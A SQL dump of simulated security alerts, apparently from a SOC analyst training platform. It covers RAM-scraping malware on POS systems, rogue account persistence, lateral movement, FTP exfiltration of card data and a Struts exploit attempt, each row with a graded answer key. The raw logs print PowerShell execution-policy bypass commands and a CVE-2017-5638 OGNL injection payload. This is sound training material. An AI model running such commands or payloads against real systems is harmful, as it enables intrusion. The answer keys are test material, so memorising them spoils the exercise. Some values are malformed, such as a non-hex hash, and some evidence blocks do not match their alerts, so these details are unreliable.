(572, 'Deploying RAM-Scraping Malware', 'high', 'Endpoint detection and response (EDR) logs', 'The EDR system detected the deployment of a RAM-scraping malware on POS systems. The malware was installed to capture unencrypted credit card data during transactions. Indicators of compromise (IOCs) were identified, including a known malicious IP address and file hash associated with RAM-scraping activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"POS-Server-01\",\"username\":\"admin\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -exec bypass -file C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"file_hash\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"source_ip\":\"198.51.100.27\",\"destination_ip\":\"192.168.1.25\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous RAM-scraping malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as RAM-scraping malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts for RAM-scraping operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(573, 'Establishing Persistence', 'medium', 'Active Directory logs', 'An unauthorized user account was created in the Active Directory to maintain persistent access to the network. The account creation was detected, indicating a potential persistence technique being employed by attackers.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:15:30Z\",\"event_id\":\"4720\",\"event_source\":\"Security\",\"computer_name\":\"DC1.corporate.local\",\"user\":\"SYSTEM\",\"target_user\":{\"account_name\":\"unauthorized_admin\",\"account_domain\":\"corporate\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"logon_type\":\"3\",\"logon_process\":\"Advapi\",\"authentication_package\":\"Negotiate\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"unauthorized_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized user account created to maintain persistence.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset 
Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(574, 'Lateral Movement to Payment Network', 'high', 'Network traffic analysis', 'FIN7 has moved laterally within the network using compromised credentials to access the payment processing network. The movement was detected through unusual network activity and the presence of known malicious IP addresses and file hashes.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:27:45Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_dump.exe\",\"event\":\"lateral movement detected\",\"description\":\"User jdoe moved laterally from 10.0.2.15 to 192.168.1.10 using stolen credentials, connecting from the external IP 203.0.113.45. Detected file hash e99a18c428cb38d5f260853678922e03 associated with known malware.\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"User credentials may have been 
compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by FIN7.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"credential_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with credential dumping tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(575, 'Data Exfiltration of Credit Card Information', 'high', 'Data Loss Prevention (DLP) logs', 'In the final stage, attackers exfiltrated credit card data via an unauthorized FTP transfer to an external IP address, preparing to monetize the information through underground channels.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:54Z\",\"event_id\":\"dlp-20231025-142354\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"21\",\"protocol\":\"FTP\",\"username\":\"compromised_user\",\"exfiltrated_files\":[\"credit_card_data.csv\"],\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"allowed\",\"alert\":\"Credit card data exfiltration detected\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external dns\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_card_data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive credit card information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated credit card data file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized 
access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.206Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:54Z\\\",\\\"event_id\\\":\\\"dlp-20231025-142354\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"21\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"exfiltrated_files\\\":[\\\"credit_card_data.csv\\\"],\\\"md5_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert\\\":\\\"Credit card data exfiltration detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 
0),
(576, 'Suspicious HTTP Request Detected', 'high', 'Web Server Logs', 'A crafted HTTP request aimed at exploiting the Apache Struts vulnerability was detected. This attack attempts to gain initial access to the server by exploiting CVE-2017-5638.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"GET\",\"url\":\"/struts2-showcase/index.action\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"payload\":\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\",\"response_code\":200,\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used for testing or malicious purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/struts2-showcase/index.action\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"payload\\\":\\\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\\\",\\\"response_code\\\":200,\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(577, 'Unusual Command Execution Observed', 'high', 'Application Logs', 'Post-exploitation activity detected. An attacker executed a series of suspicious commands to establish control over the server. The commands are indicative of an attempt to further compromise the system by downloading additional malicious payloads.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"log_source\":\"application_log\",\"event_type\":\"command_execution\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"command\":\"powershell -exec bypass -File C:\\\\Users\\\\Public\\\\malicious.ps1\",\"malicious_file\":\"C:\\\\Users\\\\Public\\\\malicious.ps1\",\"attacker_ip\":\"198.51.100.23\",\"hash\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"additional_info\":\"Command executed with elevated privileges\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.209Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"log_source\\\":\\\"application_log\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"command\\\":\\\"powershell -exec bypass -File 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"malicious_file\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malicious.ps1\\\",\\\"attacker_ip\\\":\\\"198.51.100.23\\\",\\\"hash\\\":\\\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\\\",\\\"additional_info\\\":\\\"Command executed with elevated privileges\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
